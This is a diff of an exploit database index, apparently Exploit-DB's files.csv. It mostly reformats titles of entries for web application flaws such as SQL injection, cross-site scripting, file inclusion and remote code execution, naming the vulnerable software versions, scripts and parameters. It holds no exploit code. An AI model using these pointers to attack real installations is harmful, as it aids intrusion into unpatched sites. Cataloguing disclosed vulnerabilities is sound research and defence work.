Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0 31235,platforms/php/webapps/31235.txt,"Jinzora 2.7.5 - 'index.php' Multiple Parameter Cross-Site Scripting",2008-02-19,"Alexandr Polyakov",php,webapps,0 31236,platforms/php/webapps/31236.txt,"Jinzora 2.7.5 - ajax_request.php Multiple Parameter Cross-Site Scripting",2008-02-19,"Alexandr Polyakov",php,webapps,0 31237,platforms/php/webapps/31237.txt,"Jinzora 2.7.5 - slim.php Multiple Parameter Cross-Site Scripting",2008-02-19,"Alexandr Polyakov",php,webapps,0 @@ -32420,7 +32422,7 @@ id,file,description,date,author,platform,type,port 31341,platforms/php/webapps/31341.txt,"Yap Blog 1.1 - 'index.php' Remote File Inclusion",2008-03-06,THE_MILLER,php,webapps,0 31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module - 'kid' Parameter SQL Injection",2008-03-06,r080cy90r,php,webapps,0 31529,platforms/php/webapps/31529.txt,"Joomla! / Mambo Component Cinema 1.0 - 'id' Parameter SQL Injection",2008-03-23,S@BUN,php,webapps,0 -31350,platforms/php/webapps/31350.txt,"CiMe - Citas Médicas - Multiple Vulnerabilities",2014-02-03,vinicius777,php,webapps,80 +31350,platforms/php/webapps/31350.txt,"CiMe Citas Médicas - Multiple Vulnerabilities",2014-02-03,vinicius777,php,webapps,80 31351,platforms/php/webapps/31351.txt,"PHP-Nuke 4nChat Module 0.91 - 'roomid' Parameter SQL Injection",2008-03-06,meloulisi,php,webapps,0 31352,platforms/php/webapps/31352.txt,"ImageVue 1.7 - popup.php path Parameter Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 31353,platforms/php/webapps/31353.txt,"ImageVue 1.7 - dir2.php path Parameter Cross-Site Scripting",2008-03-07,ZoRLu,php,webapps,0 @@ -32485,7 +32487,7 @@ id,file,description,date,author,platform,type,port 31442,platforms/asp/webapps/31442.txt,"Iatek PortalApp 4.0 - 'links.asp' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 31443,platforms/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,php,webapps,0 31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - 'manager/getImportFileRedirect.jsp' file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 -31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp' 'dir' Parameter Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 +31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp dir' Parameter Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0 31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - 'add_user.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 @@ -32540,7 +32542,7 @@ id,file,description,date,author,platform,type,port 31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 - include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 - include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 - style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - 'geo_zones.php' 'zID' Parameter SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 +31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - 'geo_zones.php zID' Parameter SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 31516,platforms/php/webapps/31516.txt,"S9Y Serendipity 1.7.5 - (Backend) Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",php,webapps,80 31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80 @@ -32679,7 +32681,7 @@ id,file,description,date,author,platform,type,port 31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496 32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80 -31735,platforms/php/webapps/31735.txt,"Concrete5 CMS 5.6.2.1 - 'index.php' 'cID' Parameter SQL Injection",2014-02-18,killall-9,php,webapps,80 +31735,platforms/php/webapps/31735.txt,"Concrete5 CMS 5.6.2.1 - 'index.php cID' Parameter SQL Injection",2014-02-18,killall-9,php,webapps,80 31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address Parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0 31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injections",2008-05-05,ZoRLu,php,webapps,0 31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 @@ -32750,7 +32752,7 @@ id,file,description,date,author,platform,type,port 31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - search_results.php keyword Parameter Cross-Site Scripting",2008-05-22,"Ali Jasbi",php,webapps,0 32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0 31833,platforms/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80 -31834,platforms/php/webapps/31834.txt,"WordPress Plugin AdRotate 3.9.4 - 'clicktracker.php' 'track' Parameter SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 +31834,platforms/php/webapps/31834.txt,"WordPress Plugin AdRotate 3.9.4 - 'clicktracker.ph track' Parameter SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 31835,platforms/php/webapps/31835.txt,"Apple Safari Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0 31836,platforms/php/webapps/31836.txt,"WordPress Plugin Upload File - 'wp-uploadfile.php' SQL Injection",2008-05-24,eserg.ru,php,webapps,0 31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 - 'fname' Parameter SQL Injection",2008-05-24,"Ali Jasbi",php,webapps,0 @@ -32798,7 +32800,7 @@ id,file,description,date,author,platform,type,port 31900,platforms/ios/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,ios,webapps,0 31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,php,webapps,0 31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 - annuaire.php annuaire Parameter SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 -31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 - admin/login.php 'Username' Field SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 +31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 - 'admin/login.php Username' SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 - last_records.php annuaire Parameter Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0 31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 - annuaire.php Multiple Parameter Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0 31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 - Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0 @@ -32831,7 +32833,7 @@ id,file,description,date,author,platform,type,port 32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection / Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Parameter Cross-Site Scripting",2008-07-11,syniack,php,webapps,0 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80 -31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php' 'id' Parameter SQL Injection",2014-02-28,HauntIT,php,webapps,80 +31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php id' Parameter SQL Injection",2014-02-28,HauntIT,php,webapps,80 32094,platforms/cgi/webapps/32094.pl,"HiFriend - 'cgi-bin/hifriend.pl' Open Email Relay",2008-07-21,Perforin,cgi,webapps,0 31975,platforms/php/webapps/31975.txt,"The Rat CMS - viewarticle.php Multiple Parameter Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0 31976,platforms/php/webapps/31976.txt,"The Rat CMS - viewarticle2.php id Parameter Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0 @@ -32841,7 +32843,7 @@ id,file,description,date,author,platform,type,port 32134,platforms/php/webapps/32134.txt,"H0tturk Panel - 'gizli.php' Remote File Inclusion",2008-07-31,U238,php,webapps,0 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400 31986,platforms/php/webapps/31986.txt,"WordPress Plugin VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 -31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - 'SalesInquiry.php' 'SortBy' Parameter SQL Injection",2014-02-28,HauntIT,php,webapps,80 +31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - 'SalesInquiry.php SortBy' Parameter SQL Injection",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",multiple,webapps,0 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0 31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection",2014-03-01,Portcullis,windows,webapps,8080 @@ -32899,7 +32901,7 @@ id,file,description,date,author,platform,type,port 32068,platforms/php/webapps/32068.txt,"Claroline 1.8.9 - phpBB/viewtopic.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 - wiki/wiki.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 - work/work.php URL Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps,0 -32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 - 'claroline/redirector.php' 'url' Parameter Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 +32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 - 'claroline/redirector.php url' Parameter Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent Cross-Site Scripting",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32077,platforms/php/webapps/32077.txt,"IBS 0.15 - 'Username' Parameter Cross-Site Scripting",2008-07-17,Cyb3r-1sT,php,webapps,0 @@ -32918,7 +32920,7 @@ id,file,description,date,author,platform,type,port 32092,platforms/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Inclusion",2008-07-21,Cru3l.b0y,php,webapps,0 32093,platforms/php/webapps/32093.txt,"PHPKF - 'forum_duzen.php' SQL Injection",2008-07-21,U238,php,webapps,0 32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - SQL Injection / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 -32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - 'modules/system/admin.php' 'fct' Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 +32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - 'modules/system/admin.php fct' Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0 32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - 'bbPath[root_theme]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 @@ -32958,7 +32960,7 @@ id,file,description,date,author,platform,type,port 32151,platforms/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,asp,webapps,0 32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80 32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80 -32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php' 'Filename' Parameter Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 +32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php Filename' Parameter Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 32168,platforms/php/webapps/32168.txt,"Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0 32169,platforms/php/webapps/32169.txt,"Crafty Syntax Live Help 2.14.6 - 'livehelp_js.php' Cross-Site Scripting",2008-08-05,CoRSaNTuRK,php,webapps,0 32170,platforms/php/webapps/32170.txt,"Softbiz Image Gallery - 'index.php' Multiple Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 @@ -33155,7 +33157,7 @@ id,file,description,date,author,platform,type,port 32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps,0 32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 - (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 -32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php' 'i' Parameter SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 +32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php i' Parameter SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Inclusion",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' URI redirection",2008-10-23,xuanmumu,php,webapps,0 32524,platforms/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection",2008-10-23,xuanmumu,php,webapps,0 @@ -33296,7 +33298,7 @@ id,file,description,date,author,platform,type,port 32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,hackerDesk,php,webapps,0 32724,platforms/php/webapps/32724.txt,"Dark Age CMS 2.0 - 'login.php' SQL Injection",2009-01-14,darkjoker,php,webapps,0 32727,platforms/php/webapps/32727.txt,"MKPortal 1.2.1 - '/modules/blog/index.php' Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps,0 -32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 - '/modules/rss/handler_image.php' 'i' Parameter Cross-Site Scripting",2009-01-15,waraxe,php,webapps,0 +32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 - '/modules/rss/handler_image.php i' Parameter Cross-Site Scripting",2009-01-15,waraxe,php,webapps,0 32729,platforms/asp/webapps/32729.txt,"LinksPro - 'OrderDirection' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 32730,platforms/asp/webapps/32730.txt,"Active Bids - 'search' Parameter Cross-Site Scripting",2009-01-15,Pouya_Server,asp,webapps,0 32731,platforms/asp/webapps/32731.txt,"Active Bids - 'search' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 @@ -33326,7 +33328,7 @@ id,file,description,date,author,platform,type,port 32779,platforms/php/webapps/32779.txt,"Ilch CMS 1.1 - 'HTTP_X_FORWARDED_FOR' SQL Injection",2009-02-06,Gizmore,php,webapps,0 32782,platforms/php/webapps/32782.txt,"FotoWeb 6.0 - Login.fwx s Parameter Cross-Site Scripting",2009-02-09,"Stelios Tigkas",php,webapps,0 32783,platforms/php/webapps/32783.txt,"FotoWeb 6.0 - Grid.fwx search Parameter Cross-Site Scripting",2009-02-09,"Stelios Tigkas",php,webapps,0 -32784,platforms/php/webapps/32784.txt,"glFusion 1.1 - Anonymous Comment 'Username' Field HTML Injection",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0 +32784,platforms/php/webapps/32784.txt,"glFusion 1.1 - Anonymous Comment 'Username' HTML Injection",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0 32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0 33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router - Cross-Site Request Forgery (Admin Password)",2014-04-30,"shyamkumar somana",hardware,webapps,80 33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 - 'login.php' Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 @@ -33421,11 +33423,11 @@ id,file,description,date,author,platform,type,port 32963,platforms/php/webapps/32963.txt,"Coppermine Photo Gallery 1.4.21 - 'css' Parameter Cross-Site Scripting",2009-04-29,"Gerendi Sandor Attila",php,webapps,0 32966,platforms/php/webapps/32966.txt,"MyBB 1.4.5 - Multiple Vulnerabilities",2009-05-03,"Jacques Copeau",php,webapps,0 32968,platforms/php/webapps/32968.sh,"IceWarp Merak Mail Server 9.4.1 Groupware Component - Multiple SQL Injections",2009-05-05,"RedTeam Pentesting",php,webapps,0 -32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Function Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 +32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0 32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0 34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass / Persistent Exploit",2014-07-23,Vulnerability-Lab,multiple,webapps,0 -32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.ph' 'sorter_value' Parameter SQL Injection",2014-04-22,chapp,php,webapps,80 +32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.ph sorter_value' Parameter SQL Injection",2014-04-22,chapp,php,webapps,80 32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32988,platforms/php/webapps/32988.txt,"VerliAdmin 0.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps,0 @@ -33440,7 +33442,7 @@ id,file,description,date,author,platform,type,port 33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 - Cross-Site Scripting / Remote Command Execution",2009-05-20,inking,php,webapps,0 33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 - Web Application Firewall Security Bypass",2009-05-20,EnableSecurity,php,webapps,0 33003,platforms/php/webapps/33003.txt,"WordPress Plugin Work-The-Flow 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 -33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 - 'dompdf.php' 'read' Parameter Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 +33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 - 'dompdf.php read' Parameter Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 33006,platforms/php/webapps/33006.txt,"Alienvault 4.3.1 - Unauthenticated SQL Injection / Cross-Site Scripting",2014-04-24,"Sasha Zivojinovic",php,webapps,443 33008,platforms/php/webapps/33008.txt,"LxBlog - Multiple Cross-Site Scripting / SQL Injection",2009-05-22,Securitylab.ir,php,webapps,0 @@ -33912,7 +33914,7 @@ id,file,description,date,author,platform,type,port 33934,platforms/php/webapps/33934.txt,"eZoneScripts - Multiple Scripts Insecure Cookie Authentication Bypass",2009-02-09,JIKO,php,webapps,0 33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 - 'sid' Parameter SQL Injection",2010-05-06,"Christophe de la Fuente",cgi,webapps,0 33957,platforms/php/webapps/33957.txt,"kloNews 2.0 - 'cat.php' Cross-Site Scripting",2010-01-20,cr4wl3r,php,webapps,0 -33937,platforms/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0 +33937,platforms/multiple/webapps/33937.txt,"WordPress Plugin TYPO3 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0 33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 - 'errinfo' Parameter Cross-Site Scripting",2010-02-06,cp77fk4r,java,webapps,0 33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80 33945,platforms/php/webapps/33945.txt,"DeluxeBB 1.x - 'newpost.php' SQL Injection",2010-05-06,"Stefan Esser",php,webapps,0 @@ -34189,15 +34191,15 @@ id,file,description,date,author,platform,type,port 34410,platforms/php/webapps/34410.txt,"PHPFinance 0.6 - 'group.php' SQL Injection / HTML Injection",2010-08-05,skskilL,php,webapps,0 34411,platforms/asp/webapps/34411.txt,"DT Centrepiece 4.5 - Cross-Site Scripting / Security Bypass",2010-08-05,"High-Tech Bridge SA",asp,webapps,0 34412,platforms/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -34413,platforms/php/webapps/34413.txt,"DiamondList - '/user/main/update_settings' 'setting[site_title]' Parameter Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -34414,platforms/php/webapps/34414.txt,"DiamondList - '/user/main/update_category' 'category[description]' Parameter Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 +34413,platforms/php/webapps/34413.txt,"DiamondList - '/user/main/update_settings setting[site_title]' Parameter Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 +34414,platforms/php/webapps/34414.txt,"DiamondList - '/user/main/update_category category[description]' Parameter Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34415,platforms/php/webapps/34415.txt,"Hulihan Applications Amethyst 0.1.5 - Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34416,platforms/php/webapps/34416.txt,"Muraus Open Blog - Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34417,platforms/php/webapps/34417.txt,"Prado Portal 1.2 - 'page' Parameter Cross-Site Scripting",2010-08-06,"High-Tech Bridge SA",php,webapps,0 34418,platforms/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting",2010-08-06,MustLive,php,webapps,0 34419,platforms/multiple/webapps/34419.txt,"ntopng 1.2.0 - Cross-Site Scripting Injection",2014-08-26,"Steffen Bauch",multiple,webapps,0 34420,platforms/cgi/webapps/34420.txt,"VTLS Virtua InfoStation.cgi - SQL Injection",2014-08-26,"José Tozo",cgi,webapps,80 -34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - 'search.php' 'cat' Parameter SQL Injection",2014-09-03,D35m0nd142,php,webapps,80 +34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - 'search.php cat' Parameter SQL Injection",2014-09-03,D35m0nd142,php,webapps,80 34424,platforms/php/webapps/34424.txt,"WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0 34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0 @@ -34205,7 +34207,7 @@ id,file,description,date,author,platform,type,port 34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 - 'SDL2.php' Cross-Site Scripting",2010-10-22,"Amol Naik",php,webapps,0 34456,platforms/php/webapps/34456.txt,"JBoard - Multiple Cross-Site Scripting / SQL Injection",2009-08-31,Inj3ct0r,php,webapps,0 34436,platforms/php/webapps/34436.txt,"WordPress Plugin ShortCode 0.2.3 - Local File Inclusion",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0 -34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 - 'Topic' Field HTML Injection",2010-08-11,3ethicalhackers.com,php,webapps,0 +34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 - 'Topic' HTML Injection",2010-08-11,3ethicalhackers.com,php,webapps,0 34440,platforms/jsp/webapps/34440.txt,"Computer Associates Oneview Monitor 6.0 - 'doSave.jsp' Remote Code Execution",2010-08-12,"Giorgio Fedon",jsp,webapps,0 34441,platforms/php/webapps/34441.txt,"JForum 2.08 - BBCode Color Tag HTML Injection",2010-05-13,"Giorgio Fedon",php,webapps,0 34443,platforms/php/webapps/34443.txt,"PaoLink 1.0 - 'scrivi.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 @@ -34248,9 +34250,9 @@ id,file,description,date,author,platform,type,port 34496,platforms/php/webapps/34496.txt,"ViArt Helpdesk - product_details.php category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34501,platforms/php/webapps/34501.txt,"Hitron Soft Answer Me - 'answers.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34503,platforms/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 - 'index.html' HTML Injection",2010-08-19,indoushka,php,webapps,0 -34504,platforms/php/webapps/34504.txt,"Cacti 0.8.7 (RedHat High Performance Computing - HPC) - utilities.php filter Parameter Cross-Site Scripting",2010-08-19,"Marc Schoenefeld",php,webapps,0 +34504,platforms/php/webapps/34504.txt,"Cacti 0.8.7 (RedHat High Performance Computing [HPC]) - 'utilities.php' Filter Parameter Cross-Site Scripting",2010-08-19,"Marc Schoenefeld",php,webapps,0 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection",2010-08-23,Sweet,php,webapps,0 